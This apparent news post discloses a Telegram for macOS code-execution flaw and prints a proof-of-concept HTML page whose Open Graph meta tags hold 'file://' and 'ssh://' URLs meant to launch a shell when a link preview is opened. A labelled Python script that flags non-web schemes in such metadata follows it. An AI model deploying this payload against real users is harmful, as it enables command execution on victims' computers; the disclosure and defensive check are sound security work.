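Telegram (macOS v4.9.155353) code execution vulnerability PoC | Industry News

No need to explain what Telegram is: if you are seeing this, update right away.

See GitHub for details: https://github.com/Metnew/telegram-links-nsworkspace-open

Someone sends you a hyperlink that contains maliciously nested code tags, and this results in command execution.

The PoC is as follows: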

<html>

<head>
    <!--<meta property="og:url"   content="%A0file://google.com/bin/sh" /> Keybase-->
    <meta property="og:url"   content="file://google.com/bin/sh" />
    <meta property="og:type"  content="article" />
    <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
    <meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " />
</head>

</html>
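
The PoC above places `file://` and `ssh://` URLs in Open Graph fields. The following is an added example, not code from the original post or the linked repository: a check a link-preview component could run on Open Graph metadata before treating any value as an openable link. The `http`/`https` allowlist, the function names and the `og:image` line in the sample are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

ALLOWED_SCHEMES = {"http", "https"}  # assumption: only web links may be opened
# Any scheme://... token, wherever it sits inside a metadata value.
URL_TOKEN = re.compile(r"([A-Za-z][A-Za-z0-9+.\-]*)://\S+")


class OGCollector(HTMLParser):
    """Collect <meta property="og:*" content="..."> pairs; HTML comments are skipped."""

    def __init__(self):
        super().__init__()
        self.props = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = dict(attrs)
        prop, content = a.get("property") or "", a.get("content") or ""
        if prop.startswith("og:"):
            self.props.append((prop, content))


def audit_preview(html):
    """Return (property, scheme, token) for each URL token outside the allowlist."""
    parser = OGCollector()
    parser.feed(html)
    findings = []
    for prop, content in parser.props:
        for m in URL_TOKEN.finditer(content):
            scheme = m.group(1).lower()
            if scheme not in ALLOWED_SCHEMES:
                findings.append((prop, scheme, m.group(0)))
    return findings


# Sample input: the meta tags from the PoC on this page, plus one constructed
# benign og:image line to show that ordinary web URLs pass.
SAMPLE = """<html><head>
<!--<meta property="og:url" content="%A0file://google.com/bin/sh" /> Keybase-->
<meta property="og:url" content="file://google.com/bin/sh" />
<meta property="og:type" content="article" />
<meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
<meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " />
<meta property="og:image" content="https://example.com/a.png" />
</head></html>"""

if __name__ == "__main__":
    for prop, scheme, token in audit_preview(SAMPLE):
        print(f"reject {prop}: scheme '{scheme}' in {token}")
```
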
Tags: Vulnerability

Posted by admin on 2019-12-9 21:49